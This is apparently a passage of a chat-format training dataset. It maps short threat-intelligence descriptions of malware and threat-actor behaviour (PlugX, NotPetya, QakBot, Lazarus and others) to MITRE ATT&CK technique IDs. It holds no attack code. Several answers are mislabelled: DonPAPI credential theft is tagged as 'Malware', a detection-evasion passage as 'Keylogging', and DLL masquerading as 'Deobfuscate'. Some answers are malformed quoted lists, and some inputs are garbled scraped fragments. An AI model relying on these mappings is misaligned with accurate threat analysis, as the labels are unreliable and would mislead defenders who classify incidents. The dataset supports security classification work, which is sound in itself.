- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM can scan victim drives to look for specific banking software on the machine to determine next actions."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QUADAGENT creates a scheduled task to maintain persistence on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "68271df868f462c06e24a896a9494225,Office Monkeys LOL Video.zip Believe it or not, recipients in bulk run the file within: 95b3ec0a4e539efaa1faa3d4e25d51de,Office Monkeys (Short Flash Movie).exe This file in turn drops two executables to %temp%: 2aabd78ef11926d7b562fd0d91e68ad3, Monkeys.exe 3d3363598f87c78826c859077606e514, player.exe It first launches Monkeys.exe, playing a self-contained, very funny video of white-collar tie wearing chimpanzees working in a high rise office with a human colleague"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading', 'T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Grandoreiro payload has been delivered encrypted with a custom XOR-based algorithm and also as a base64-encoded ZIP file."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can obtain a list of SIDs and provide the option for selecting process tokens to impersonate."
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A JPIN uses a encrypted and compressed payload that is disguised as a bitmap within the resource section of the installer."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NotPetya will reboot the system one hour after infection."
- },
- {
- "role": "assistant",
- "content": "T1529 - System Shutdown/Reboot"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "(Source: Dell SecureWorks) Further research revealed additional tools containing the same username (see Figure 21)"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "2. The perpetrators distributed PlugX messages to employees- personal addresses, claiming to come from fellow members of staff. The letters contained photos of alleged senders. Along with the photos, all the information about personal mailboxes could have been collected during the group-s initial presence on corporate workstations."
- },
- {
- "role": "assistant",
- "content": "T1114 - Email Collection', 'T1598 - Phishing for Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For C0010, UNC3890 actors staged tools on their infrastructure to download directly onto a compromised system."
- },
- {
- "role": "assistant",
- "content": "T1608.002 - Upload Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has used HTTPS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is a RAT that communicates with HTTP."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Siloscape connects to an IRC server for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Five minutes after the automated reconnaissance activities are completed, the QAKBOT-injected wermgr.exe process drops the Brute Ratel DLL and invokes it via a rundll32.exe child process with the “main” export function."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The backdoor determines its C2 server using a Domain Generation Algorithm (DGA) to construct and resolve a subdomain of avsvmcloud[.]com. The Update method is responsible for initializing cryptographic helpers for the generation of these random C2 subdomains. Subdomains are generated by concatenating a victim userId with a reversible encoding of the victims local machine domain name"
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware used by the threat group can be configured to bypass network-based detection; however, the threat actors rarely modify host-based configuration settings when deploying payloads. The threat actors demonstrated the ability to adapt when reentering a network after an eviction, overcoming technical barriers constructed by network defenders"
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For this method, Ransom Cartel uses a tool named \"\"DonPAPI,\"\" which can search hosts for DPAPI blobs containing Wi-Fi keys, RDP passwords, and credentials saved in web browsers and then download and decrypt them locally on the machine."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Doki has communicated with C2 over HTTPS."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The SQLRat script is designed to make a direct SQL connection to a Microsoft database controlled by the attackers and execute the contents of various tables"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NanoCore uses DES to encrypt the C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AuTo Stealer can use `cmd.exe` to execute a created batch file."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silence has used VBS scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Throughout the year, Volexity identified multiple Vietnamese-language news websites that appeared to be compromised, as they were being used to load an OceanLotus web profiling framework. The exact functionality varied from site to site, but the goal of these frameworks was to gather information about site visitors and, in some cases, deliver malware. This code appears to be a variation of what Volexity has previously described as Framework A"
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The PcShare payload has been injected into the `logagent.exe` and `rdpclip.exe` processes."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has downloaded files, malware, and tools from its C2 onto a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a large list of C2 servers that it cycles through until a successful connection is established."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SMOKEDHAM has relied upon users clicking on a malicious link delivered through phishing."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to gather the IP address from the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Regin has used a hidden file system to store some of its components."
- },
- {
- "role": "assistant",
- "content": "T1564.005 - Hidden File System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "29],[30(link is external)] - During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware. 32(link is external)] Kimsuky also targets Microsoft Office users by formatting their documents in a .docx file rather than .hwp and will tailor their macros accordingly"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": ". The attackers have also used file names and export API names in the CRAT DLLs to masquerade the RAT as a benign application's library. Some examples of the exported function names are:. "
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sykipot may use \"net view /domain\" to display hostnames of available systems on a network."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Matryoshka is capable of keylogging."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BITSAdmin can be used to create BITS Jobs to upload and/or download files from SMB file servers."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "attempts to access the ADMIN$, C$\\Windows, D$\\Windows, and E$\\Windows shares on the victim with its current privileges."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TAINTEDSCRIBE can download additional modules from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used Web shells, often to maintain access to a victim network."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0015, the threat actors installed the AnyDesk remote desktop application onto the compromised network."
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In at least two incident response (IR) engagements, Blue Mockingbird has exploited public-facing web applications (T1190: Exploit Public-Facing Application) that implemented Telerik UI for ASP.NET AJAX. This suite of user interface components accelerates the web development process, but some versions are susceptible to a deserialization vulnerability, CVE-2019-18935. The exploitation of this CVE is not unique to Blue Mockingbird, but it has been a common point of entry"
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Final1stspy uses HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlugX has a module for capturing keystrokes per process including window titles."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When communicating with its C2 server, Psylo will use HTTPS with a unique user-agent of (notice the lack of a space between \"5.0\" and \"(Windows"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "With the above done, the malware logs off all users and executes a small program — a “locker” — in a new thread. The path to the locker file named mssetup.exe is retrieved from the configuration. Finally, before moving to its main cause — wiping the system — the malware creates a scheduled task that assures its own persistence in the system. The scheduled task will be executed every time the system starts"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A few minutes after the initial execution, BazarLoader ran some discovery tasks using the built in Microsoft net and nltest utilities and transferred the results over the C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LaZagne can perform credential dumping from memory to obtain account and password information."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrongPity can parse the hard drive on a compromised host to identify specific file extensions."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If yes, it generates an RSA PKCS key using CryptGenKey that is used for encryption of communication session keys. It then writes the RSA key to the PRVK key in the [Version] section of the config file. Turla’s Carbon backdoor also implements RSA encryption on the session keys for some of its C&C channels"
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda has used a customized PlugX variant which could spread through USB connections."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the exploit succeeds, this Fallout Exploit Kit downloads a “.tmp” file to the %Temp% directory and calls CreateProcess to execute it. Further analysis revealed that the “.tmp” file was the latest variant of Azorult malware. It was the first time we’ve seen the new variant of Azorult malware used as primary payload for Fallout Exploit Kit"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware initiates its main function of capturing user keystrokes and sending them to the control server using standard Windows networking APIs"
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging', 'T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is a simple proxy that creates an outbound RDP connection."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla can collect the IP address of the victim machine and spawn instances of netsh.exe to enumerate wireless settings."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gold Dragon uses cmd.exe to execute commands for discovery."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used multi-stage malware components that inject later stages into separate processes."
- },
- {
- "role": "assistant",
- "content": "T1104 - Multi-Stage Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 has used port-protocol mismatches on ports such as 53, 80, 443, and 8080 during C2."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSTATS can use DDE to execute additional payloads on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When communicating with its C2 server, the downloaders use multiple protocols, specifically HTTPS, HTTP or DNS, each of which provide a fallback channel in that order"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 has registered look-alike domains for use in phishing campaigns."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has renamed the \"psexec\" service name to \"mstdc\" to masquerade as a legitimate Windows service."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kwampirs decrypts and extracts a copy of its main DLL payload when executing."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TajMahal has the ability to steal documents from the local system including the print spooler queue."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The QakBot dropper can delay dropping the payload to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It moves the property list (plist) file com.dorusio.pkg.wallet.plist from the Installer package to the /Library/LaunchDaemons/ folder (Scheduled Task/Job: Launchd [T1053.004]). Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches Dorusio_upgrade and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004"
- },
- {
- "role": "assistant",
- "content": "T1543.004 - Create or Modify System Process: Launch Daemon"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PipeMon's first stage has been executed by a call to \"CreateProcess\" with the decryption password in an argument. PipeMon has used a call to \"LoadLibrary\" to load its installer."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 11: XML configuration file to schedule the task The Zyklon malware first retrieves the external IP address of the infected machine using the following: api.ipify[.]org ip.anysrc[.]net myexternalip[.]com whatsmyip[.]com The Zyklon executable contains another encrypted file in its .Net resource section named tor"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 obfuscates strings and payloads."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has deployed scripts on compromised systems that automatically scan for interesting documents."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MCMD can upload additional files to a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a batch file that configures the ComSysApp service to autostart in order to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used ping to identify other machines of interest."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The LNK file is finally used to identify a third file: a ZIP file"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EvilBunny has deleted the initial dropper after running through the environment checks."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Curiously, the same private session key is also encrypted with another public key hardcoded into the body of the Trojan, regardless of the configuration. It turns out that someone who knows the private key corresponding to the public skeleton key is able to decrypt the victim’s files, even without the private key for sub_key. It seems like the Trojan developers built a loophole into the algorithm allowing them to decrypt files behind the distributors’ back"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
